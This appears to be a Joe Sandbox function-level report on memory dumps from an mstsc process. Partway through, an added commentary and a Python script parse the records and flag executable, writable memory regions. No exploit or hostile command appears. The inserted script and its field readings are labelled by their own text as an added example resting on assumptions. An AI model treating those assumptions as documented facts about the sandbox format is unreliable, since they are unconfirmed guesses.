                                                                                                                                                                                    • Opcode Fuzzy Hash: a49b3f2540748166b1279ea40ef86377bb4a446bbc0c7894559379ba9123ef61
                                                                                                                                                                                    • Instruction Fuzzy Hash: A5215BB3E48225ABCB219AD99805D6FFAA89FD57B4F1542A9FC04A7340DA34CE0096D0
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000098,009535CA,00000000,00000000,?,?,0095399A,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0095434B
                                                                                                                                                                                    • _wcslwr.MSVCRT ref: 009543B7
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,0095399A,00000000,00000000,00000000,00000000,00000000,?,?,?,009535CA,00000000,00000000,-00000001), ref: 009543CA
                                                                                                                                                                                      • Part of subcall function 00964E47: EventActivityIdControl.ADVAPI32(00000001,00000000,0096A020,00000000,00000000,00000000), ref: 00964E6E
                                                                                                                                                                                      • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Local$ActivityAllocControlEventFreeMessageTrace_wcslwr
                                                                                                                                                                                    • String ID: StringCchCopy failed!
                                                                                                                                                                                    • API String ID: 3261266422-2217176558
                                                                                                                                                                                    • Opcode ID: 6b0306a4e338a340717e2b5480b128985395bb999ab9d8fe454f5fade5da7df4
                                                                                                                                                                                    • Instruction ID: 08b8087ebbef7fa5f55b5ed2a73013972c7184d0aedb1dbb2c1483d37dda44f0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b0306a4e338a340717e2b5480b128985395bb999ab9d8fe454f5fade5da7df4
                                                                                                                                                                                    • Instruction Fuzzy Hash: E5119C322043146FC726DF11DC08F2BBBA9EF8576AF10801DFD48672A1CAB0CC949B84
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetFocus.USER32(?,0095D9F3,00000081,?,?,00000000,00000000,?,0095D97E,00000081,?,?), ref: 0095EA52
                                                                                                                                                                                    • IsChild.USER32(000000FF,00000000,?,0095D9F3,00000081,?,?,00000000,00000000,?,0095D97E,00000081,?,?), ref: 0095EA5C
                                                                                                                                                                                    • SetFocus.USER32 ref: 0095EA69
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
  • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
Strings
• m_spOleInPlaceActiveObject->GetWindow failed, xrefs: 0095EA2D
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Focus$AddressChildFreeHandleLibraryMessageModuleProcTrace
• String ID: m_spOleInPlaceActiveObject->GetWindow failed
• API String ID: 3636661317-3056059153
• Opcode ID: d24406d29282c37f978242994052806c9c7f02b0889b70549e3a84c825851ebf
• Instruction ID: 208cc2d602ba10ca825f35faf27bb2544fa1f30dfd79340f7bc7470b2329acad
• Opcode Fuzzy Hash: d24406d29282c37f978242994052806c9c7f02b0889b70549e3a84c825851ebf
• Instruction Fuzzy Hash: 6D11E372604304AFCB2ACF6ADC08F6A7BA9FF85311F104059F90497260C672CE45ABA4
APIs
• MonitorFromWindow.USER32(?,00000000,?,?), ref: 0094BC00
• GetMonitorInfoW.USER32(00000000,00000028), ref: 0094BC0F
• CopyRect.USER32(00000000,?), ref: 0094BC1E
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Monitor$CopyFromInfoRectWindow
• String ID: (
• API String ID: 3650910003-3887548279
• Opcode ID: d4938d3126bddcc4c55a4854b42d5abeb0678efea612b3df11d5efe1150c6227
• Instruction ID: f7b36a145bfa6b2d0cb79a8686f3dbe90a3e29dbce80ef302a2242a8899afc19
• Opcode Fuzzy Hash: d4938d3126bddcc4c55a4854b42d5abeb0678efea612b3df11d5efe1150c6227
• Instruction Fuzzy Hash: A1F0D171E00108ABD714DBAD9C88ABFB7ACDF48611B01452DE944E7250EF70DD0596A0
APIs
Memory Dump Source
• Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
• Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
Similarity
• API ID: __fassign
• String ID:
• API String ID: 3965848254-0
• Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
• Instruction ID: 0dde98617c0ca3235a6c5abee37bc549590b9915882700adb0bf50fa4863d664
• Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
• Instruction Fuzzy Hash: 4591A031E2024AEFDF24CFE8C9447AEB7B5FF45308F20846AD806A7599E7704A45CB95
APIs
• ??2@YAPAXI@Z.MSVCRT ref: 0091795D
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
  • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: ??2@AddressFreeHandleLibraryMessageModuleProcTrace
• String ID: CAxHostWnd$CreateExtension failed$OnPreCreateControl failed
• API String ID: 3058038507-92757506
• Opcode ID: 3a6bea4223f4f2ac3d69a1eb2ee1ff3cf836f0628b51616e3094818773e47075
• Instruction ID: 96a7c5bbae0c2f3ac92b346dbf98bd40a0e245ad5800c94c06f74e73a21b6157
• Opcode Fuzzy Hash: 3a6bea4223f4f2ac3d69a1eb2ee1ff3cf836f0628b51616e3094818773e47075
• Instruction Fuzzy Hash: 6971C17175C34AAFC7298F94C848FA4BBBAAB49314B15018AE5049B2B2C775CCD0DF85
APIs
• LocalAlloc.KERNEL32(00000040,-00000003,009535CA,00000000,00000000,?,009539AA,00000000,00000000,009535CA,00000000,00000000,00000000,00000000,00000000,?), ref: 00953A26
• LocalAlloc.KERNEL32(00000040,009535C6,009535CA,00000000,00000000,?,009539AA,00000000,00000000,009535CA,00000000,00000000,00000000,00000000,00000000,?), ref: 00953A75
• memset.MSVCRT ref: 00953AD0
• wcstol.MSVCRT ref: 00953B4B
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: AllocLocal$memsetwcstol
• String ID:
• API String ID: 389679083-0
• Opcode ID: d3d9628a1df5fb930c9caf0324a3f45b2382293459de1d49e1099dfcdbf12b19
• Instruction ID: 149afc70d7669cdcf2824f9709df294f4305bc45ecc26873317c6fb13b213c9d
• Opcode Fuzzy Hash: d3d9628a1df5fb930c9caf0324a3f45b2382293459de1d49e1099dfcdbf12b19
• Instruction Fuzzy Hash: E541F27160030AABDB28DF36D845B66779DEB44385F08C429FD46CB291E671DE449B90
APIs
• wcstok_s.MSVCRT ref: 0092FBB3
• LocalFree.KERNEL32(00000000), ref: 0092FBD8
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
  • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Free$AddressHandleLibraryLocalMessageModuleProcTracewcstok_s
• String ID:
• API String ID: 1445397207-0
• Opcode ID: 01fbe893cb4f8860031a8a44c3e80eacfd06bbd533ca7c9976b3668e83a27a49
• Instruction ID: 2fcb906c45551af513072c49cf952a5cc150639e9b401fac51c0a9b7c46bcbc8
• Opcode Fuzzy Hash: 01fbe893cb4f8860031a8a44c3e80eacfd06bbd533ca7c9976b3668e83a27a49
• Instruction Fuzzy Hash: C74181759002299FDB249F24ECA9FEAB7B9EB48304F1441FAE80D93154EB309E959F50
APIs
• DefWindowProcW.USER32(?,?,?,?), ref: 00922393
• SendMessageW.USER32(?,?,?,?), ref: 009223D4
• SetFocus.USER32 ref: 009223F3
• SendMessageW.USER32(?,00000005,?,00000000), ref: 00922447
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: MessageSend$FocusProcWindow
• String ID:
• API String ID: 2656717170-0
• Opcode ID: 21f9cc46d32d771945078b567d3cdf65e2848ab59dd9cf667c42aafec191386a
• Instruction ID: 88f66909342500ced18b7fdad94b5d309600f16cfbd221505c2bc4a394ca6168
• Opcode Fuzzy Hash: 21f9cc46d32d771945078b567d3cdf65e2848ab59dd9cf667c42aafec191386a
• Instruction Fuzzy Hash: 54317A7261021AAFDB18DFA4D858DBEBB79EF48711B04861CF9068A178CB35E910DB50
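The records above are Joe Sandbox's per-function listings for code found in the mstsc process (the dump names start with process index 0000000A and the snapshot names end in mstsc): each block gives the API calls made directly or through subcalls, the dumped region the function came from, and the hashes used for similarity matching. When a report carries hundreds of these, triage is easier per region than per function. The script that follows is an added example, not Joe Sandbox code and not part of this report: it parses records in this layout, groups them by the Offset of the dumped region, tallies each region's direct API calls and String ID entries, and lists which regions are marked "based on PE: true" while sitting in PAGE_EXECUTE_READWRITE memory. Its sample input is three records copied from this page and trimmed to the lines the parser reads. Two readings of the file names are assumptions rather than documented facts: that the fifth dotted field of the .sdmp name is the Windows page-protection value (0x40 = PAGE_EXECUTE_READWRITE), and that the last underscore-separated part of the .jbxd name is the process image name. Under those assumptions both the 0x900000 region and the 0x2280000 region carry 0x40 here, so the RWX flag alone does not separate the region holding mstsc's OLE/ActiveX hosting strings (CAxHostWnd, m_spOleInPlaceActiveObject) from the region that shows only the CRT helper __fassign; the per-region API and string sets are what the analyst compares next.

```python
import re
from collections import Counter, defaultdict

# winnt.h page protection.  Reading the fifth dotted field of the .sdmp file
# name as this constant is an assumption about Joe Sandbox's naming scheme.
PAGE_EXECUTE_READWRITE = 0x40

API_RE = re.compile(
    r"^•\s+(?P<sub>Part of subcall function [0-9A-F]+: )?"
    r"(?P<name>[^\s.(]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\([^)]*\))?,? ref: (?P<ref>[0-9A-F]+)$")
SOURCE_RE = re.compile(
    r"Source File: (?P<dump>\S+)\.sdmp, Offset: (?P<offset>[0-9A-F]+), "
    r"based on PE: (?P<pe>true|false)")
SNAPSHOT_RE = re.compile(r"Snapshot File: (?P<snap>\S+)\.jbxd")
STRING_RE = re.compile(r"^•\s+String ID:\s*(?P<s>.*)$")
OPCODE_RE = re.compile(r"Opcode ID: (?P<id>[0-9a-f]{64})")

# Constructed sample: three records copied from the report and trimmed to the
# lines the parser reads.  Not a complete Joe Sandbox export.
SAMPLE = """\
APIs
• MonitorFromWindow.USER32(?,00000000,?,?), ref: 0094BC00
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
• String ID: (
• Opcode ID: d4938d3126bddcc4c55a4854b42d5abeb0678efea612b3df11d5efe1150c6227
APIs
Memory Dump Source
• Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
• Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
• API ID: __fassign
• Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
APIs
• ??2@YAPAXI@Z.MSVCRT ref: 0091795D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
• String ID: CAxHostWnd$CreateExtension failed$OnPreCreateControl failed
• Opcode ID: 3a6bea4223f4f2ac3d69a1eb2ee1ff3cf836f0628b51616e3094818773e47075
"""


def split_records(text):
    """Yield the stripped lines of each record; every record starts at 'APIs'."""
    record = []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            if record:
                yield record
            record = []
        elif line:
            record.append(line)
    if record:
        yield record


def parse_record(lines):
    """Extract direct APIs, subcall APIs, strings and dump metadata from one record."""
    rec = {"apis": [], "subcalls": [], "strings": [], "opcode_id": None,
           "process": None, "offset": None, "protection": None, "pe": None}
    for line in lines:
        if m := API_RE.match(line):
            rec["subcalls" if m["sub"] else "apis"].append(
                (m["module"], m["name"], int(m["ref"], 16)))
        elif m := SOURCE_RE.search(line):
            rec["offset"] = int(m["offset"], 16)
            rec["protection"] = int(m["dump"].split(".")[4], 16)  # assumed field meaning
            rec["pe"] = m["pe"] == "true"
        elif m := SNAPSHOT_RE.search(line):
            rec["process"] = m["snap"].rsplit("_", 1)[-1]  # assumed: image name suffix
        elif m := STRING_RE.match(line):
            rec["strings"] = [s for s in m["s"].split("$") if s]
        elif m := OPCODE_RE.search(line):
            rec["opcode_id"] = m["id"]
    return rec


def summarize(text):
    """Map region offset -> process, protection, PE flag, functions, API counts, strings."""
    regions = defaultdict(lambda: {"process": None, "protection": None, "pe": None,
                                   "functions": set(), "apis": Counter(), "strings": set()})
    for lines in split_records(text):
        rec = parse_record(lines)
        if rec["offset"] is None:
            continue  # record without a memory dump source line
        region = regions[rec["offset"]]
        region.update(process=rec["process"], protection=rec["protection"], pe=rec["pe"])
        if rec["opcode_id"]:
            region["functions"].add(rec["opcode_id"])
        region["apis"].update(f"{mod}!{name}" for mod, name, _ in rec["apis"])
        region["strings"].update(rec["strings"])
    return dict(regions)


def rwx_pe_regions(regions):
    """Offsets of regions that are PE-shaped yet mapped writable and executable."""
    return sorted(off for off, r in regions.items()
                  if r["pe"] and r["protection"] == PAGE_EXECUTE_READWRITE)
```

To use it on a real report, save the whole function listing as text and pass it to summarize(); summarize(SAMPLE) yields two regions keyed 0x900000 and 0x2280000, and rwx_pe_regions() returns both. Subcall APIs are kept separately from direct calls so that the GetProcAddress/TraceMessage helpers shared by many functions do not swamp the per-region counts.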
APIs
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00921050
• memset.MSVCRT ref: 0092107C
• SendMessageW.USER32(?,0000104B,00000000,?), ref: 009210C3
• lstrcmpiW.KERNEL32(?,?,?,?,?), ref: 009210D5
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: MessageSend$lstrcmpimemset
• String ID:
• API String ID: 1640975521-0
• Opcode ID: 18c3c37b885bad9d3ff46ab3ba9d580f9c0bc22dffec9f075e81b858f1eaeddf
• Instruction ID: 194ac49ab2bceb6b0fed9402a14c4011ab739c54082077e1a7037946aaf4ef96
                                                                                                                                                                                    • Opcode Fuzzy Hash: 18c3c37b885bad9d3ff46ab3ba9d580f9c0bc22dffec9f075e81b858f1eaeddf
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C41D671A0522C9BCB25DF55DC88BEABBB9EF54700F1041D9E908A3215D6718EE0CF90
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00943390: LocalFree.KERNEL32(?,?,00913402,00000001,00901B90,00000000,00000000,00000000,00000000,00000000,?,?,?,?), ref: 0094339C
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,-00000002,00000000,?,?,?,?,00913472,00000000,00000001,00000000,00000000,?,00000000,00000000), ref: 009432DC
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeLocal$AddressAllocHandleLibraryMessageModuleProcTrace
                                                                                                                                                                                    • String ID: PTSTR$StringCbCopy failed!$StringCbLength failed!
                                                                                                                                                                                    • API String ID: 139613657-1177650164
                                                                                                                                                                                    • Opcode ID: c9c01df5176ccbf93ef749f6d63a0cf1c5f546fc899b11504dfd8a0ef0242c16
                                                                                                                                                                                    • Instruction ID: f3264808f1707564df83bdabab751eeff11b927b11f2c6e513f19df6563328ec
                                                                                                                                                                                    • Opcode Fuzzy Hash: c9c01df5176ccbf93ef749f6d63a0cf1c5f546fc899b11504dfd8a0ef0242c16
                                                                                                                                                                                    • Instruction Fuzzy Hash: 59313931A04344AFDB259F79C849F1A7B9AAF45324F44C088F900AB2A2CBB4DE40DB85
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _ftol2_sse.MSVCRT ref: 00951A9A
                                                                                                                                                                                    • _ftol2_sse.MSVCRT ref: 00951ABE
                                                                                                                                                                                      • Part of subcall function 00951B44: _CIpow.MSVCRT ref: 00951B67
                                                                                                                                                                                    • _ftol2_sse.MSVCRT ref: 00951AF3
                                                                                                                                                                                      • Part of subcall function 00951B44: _CIpow.MSVCRT ref: 00951B8E
                                                                                                                                                                                    • _ftol2_sse.MSVCRT ref: 00951B2A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _ftol2_sse$Ipow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3485170201-0
                                                                                                                                                                                    • Opcode ID: 3fbabbb27d7a43244b4e01e8891d8c53af42947e057b9e7b8abb49ca8dd7d24b
                                                                                                                                                                                    • Instruction ID: 5e50ff24417a624794b237153f0e72de8dd5eeb7bee45f9fdef3d633d1f0b184
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fbabbb27d7a43244b4e01e8891d8c53af42947e057b9e7b8abb49ca8dd7d24b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 99314331108B46CBC700EF2AE58911ABFE4FF88310F868989E8D886159DB30D538C797
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0094085C
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • StringCchPrintf failed constructing registry string!, xrefs: 009408EA
                                                                                                                                                                                    • %s\%s, xrefs: 009408B4
                                                                                                                                                                                    • RemoteApplications, xrefs: 009408AF
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryMessageModuleProcTracememset
                                                                                                                                                                                    • String ID: %s\%s$RemoteApplications$StringCchPrintf failed constructing registry string!
                                                                                                                                                                                    • API String ID: 1171831687-3777318425
                                                                                                                                                                                    • Opcode ID: f0b49e74cdb18aea2b16a94c86c3c03fab4ef0731eec1ed761886ca8a2a492cc
                                                                                                                                                                                    • Instruction ID: 69cc41509a47a7ab1e92905717bb5a9ae07271a1598592dacb285622e964106f
                                                                                                                                                                                    • Opcode Fuzzy Hash: f0b49e74cdb18aea2b16a94c86c3c03fab4ef0731eec1ed761886ca8a2a492cc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B21B43264C3447FE7399B549C05F913A9AAB85324F150088FA486A6F3C6BADC90AF95
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 009580D3
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 0095818E
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Failed to get the file contents as a string!, xrefs: 0095811F
                                                                                                                                                                                    • Failed to set memory stream contents!, xrefs: 00958162
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Free$??2@AddressHandleLibraryLocalModuleProc
                                                                                                                                                                                    • String ID: Failed to get the file contents as a string!$Failed to set memory stream contents!
                                                                                                                                                                                    • API String ID: 968352646-411829037
                                                                                                                                                                                    • Opcode ID: 8e425816866c6582666653136e2dbe494d0b8c6a04d20253db922515054b6dab
                                                                                                                                                                                    • Instruction ID: 839cc8afef840ef582df3412c5eac3065bfa1232986731824830099736200a02
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e425816866c6582666653136e2dbe494d0b8c6a04d20253db922515054b6dab
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A21E732608314BFCB15DB5AC859FAA7BA5EB85351F080059FD01B71A1CF71CD4AEB81
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,00943133), ref: 00951428
                                                                                                                                                                                    • GetDlgItem.USER32(?,00003381), ref: 00951435
                                                                                                                                                                                    • GetWindowPlacement.USER32(?,?), ref: 00951459
                                                                                                                                                                                    • GetWindowPlacement.USER32(?,?), ref: 00951462
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ItemPlacementWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1803133493-0
                                                                                                                                                                                    • Opcode ID: e4a3832d6e5ae41e4a60b8856916b68aeb998922d167d49cda8e82467a05f665
                                                                                                                                                                                    • Instruction ID: e2691871f75f6e0d7d09a947f204530f977c1b701449f1b1d34a5bbab8b11f4c
                                                                                                                                                                                    • Opcode Fuzzy Hash: e4a3832d6e5ae41e4a60b8856916b68aeb998922d167d49cda8e82467a05f665
                                                                                                                                                                                    • Instruction Fuzzy Hash: D9215C72E0031CABDB00DFA5DC95AAEBBB9FB48310F00412AE904AB250CB706D05CB90
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Menu$EnableItem$InsertSystem
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3907634308-0
                                                                                                                                                                                    • Opcode ID: 163f4164c3a9cb0b24a6242cba84d39fb42ad202dc8f37474e0e1cd8028a2b2a
                                                                                                                                                                                    • Instruction ID: 2092cd3a2e49e44cd789989fa1ab7aafc5b13200bc047a7218af1eb34fd9268b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 163f4164c3a9cb0b24a6242cba84d39fb42ad202dc8f37474e0e1cd8028a2b2a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7111D3317043087FD7249F549C4EF7A7BADAB85710F140069F540AB1E2CBE5DC51AB52
APIs
Memory Dump Source
